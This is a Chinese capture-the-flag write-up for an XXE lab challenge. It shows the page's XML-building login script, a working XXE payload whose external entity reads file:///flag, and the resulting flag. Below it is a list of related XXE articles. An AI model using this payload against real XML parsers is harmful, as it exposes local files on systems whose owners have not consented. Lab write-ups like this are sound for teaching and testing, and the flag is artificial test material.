发现输入的username被alert了
查源码

onclick="XMLFunction()"

抓包看xml格式
回来看控制台
发现js的xml应用

<script type="text/javascript">function XMLFunction(){var xml = '' +'<?xml version="1.0" encoding="UTF-8"?>' +'<root>' +' <username>' + $('#username').val() + '</username>' +' <password>' + $('#password').val() + '</password>' +' </root>';var xmlhttp = new XMLHttpRequest();xmlhttp.onreadystatechange = function () {if(xmlhttp.readyState == 4){console.log(xmlhttp.readyState);console.log(xmlhttp.responseText);alert(xmlhttp.responseText);}}xmlhttp.open("POST","login.php",true);xmlhttp.send(xml);};</script>

构造xxe攻击
这是post包传的时候记得把注释删去

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY flag SYSTEM "file:///flag"><!--构造实体-->
]>
<root>
<username>&flag;</username><!--输出flag实体-->
<password>2333</password>
</root>

flag{6866a844-3788-4a9d-9909-1d9d9943f56f}

BUU XXE COURSE相关推荐

  1. java中xxe漏洞修复方法

    java中禁止外部实体引用的设置方法不止一种,这样就导致有些开发者修复的时候采用的错误的方法 之所以写这篇文章是有原因的!最早是有朋友在群里发了如下一个pdf, 而当时已经是2019年1月末了,应该不 ...

  2. java SAX 防xml注入,如何防止XML注入像XML Bomb和XXE攻击

    您是否尝试过 OWASP page的以下代码段? import javax.xml.parsers.DocumentBuilderFactory; import javax.xml.parsers.P ...

  3. XXE漏洞检测及代码执行过程

    这两天看了xxe漏洞,写一下自己的理解,xxe漏洞主要针对webservice危险的引用的外部实体并且未对外部实体进行敏感字符的过滤,从而可以造成命令执行,目录遍历等.首先存在漏洞的web服务一定是存 ...

  4. switchyomega插件_CTF|你所关注的CTFer都在用的插件合集【附:XXE补给+CTF训练集】...

    不看后悔系列,建议收藏 相信大家对 CTF 都不陌生了,今天为大家带来了一系列 CTF 必备 Chrome 插件. CTF 可能很多人想学 CTF,但又怕零基础学不懂.其实,CTF 并没有那么难. C ...

  5. zimbra xxe+ssrf 导致 getshell

    前言 2019年3月13号,国外一名安全研究员在他的博客上公布了zimbra的这起漏洞,但是其中并未提到一些漏洞的利用细节,在此我将整个漏洞的利用过程进行复现. 原文链接:https://blog.t ...

  6. xxe漏洞攻防 简介 xml 引用外部实体 构造恶意内容

    目录 一.XML基础知识 二.XML外部实体注入(XML External Entity) 三.客户端XXE案例 四.防御XXE攻击 一.XML基础知识 XML用于标记电子文件使其具有结构性的标记语言 ...

  7. cve-2017-12629 apache solr xxe rce 漏洞分析

    Versions Affected Apache Solr before 7.1.0 with Apache Lucene before 7.1 Elasticsearch, although it ...

  8. 浅谈XXE漏洞攻击与防御——本质上就是注入,盗取数据用

    浅谈XXE漏洞攻击与防御 from:https://thief.one/2017/06/20/1/ XML基础 在介绍xxe漏洞前,先学习温顾一下XML的基础知识.XML被设计为传输和存储数据,其焦点 ...

  9. XXE Lab:1题解

    思路 题目已经提示是XXE的专项练习,所以,直接找XXE问题. 难度 入门 端口扫描 nmap -sS -A 10.129.10.64 发现HTTP服务.Apache 2.4.27中间件.robots ...

  10. 1016.XXE漏洞攻防学习

    前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识. xml基础知识 要了解xxe漏洞,那么一定得先 ...

最新文章

  1. Jmeter脚本录制(APP)
  2. 1.springMVC+spring+Mybatis的整合思路
  3. ylbtech-LanguageSamples-Arrays(数组)
  4. 中公教育计算机网络,计算机考试题库:计算机网络模拟练习题(2)
  5. html messagebox确定取消,Element MessageBox弹框的具体使用
  6. 【图像超分辨率论文】BasicVSR++: Improving Video Super-Resolution with Enhanced Propagation and Alignment
  7. maven aspectj_使用Spring AspectJ和Maven进行面向方面的编程
  8. Intellij idea安装JRebel插件 实现代码的热部署
  9. 不良事件总结怎么写_护理不良事件总结分析.doc
  10. java 静态绑定_java的动态绑定和静态绑定
  11. Wannafly挑战赛14 F
  12. 计算机美食网页毕业论文,毕业论文--美食网页计与制作.doc
  13. JavaScript的通用库与动画特效
  14. SAP 用户没有下载数据到本地的权限
  15. PIL(pillow)读取图片自动旋转的问题
  16. CTF初学笔记解题-密码1
  17. meta标签(以京东首页为例)
  18. 【中土世界】萨鲁曼小传
  19. 朱子治家格言(清朝·朱柏庐)
  20. python+selenium+chrome实现淘宝购物车秒杀自动结算

热门文章

  1. 魅族的usb计算机连接无法使用,魅族16怎么连接电脑 魅族手机连接电脑无法识别...
  2. 马克思在《数学手稿》中提出如下问题:有30个人(包括男人、女人和小孩)在一家饭店吃饭共花50先令,其中每个男人花3先令,每个女人花2先令,每个小孩花1先令,问男人、女人、小孩各有多少人
  3. 全国海选第三期:广州赛区节目视频
  4. 基于访客的网络(VBN)
  5. 3.注册后台处理逻辑编写
  6. 验证性因子分析(二)
  7. 安工大计算机学院李雪,计算机学院本科生党支部召开党员大会
  8. wamp3.1.0 X64下载链接(最新)
  9. 前端别再错过2022的金三银四了。。
  10. React组件抽象(一): mixin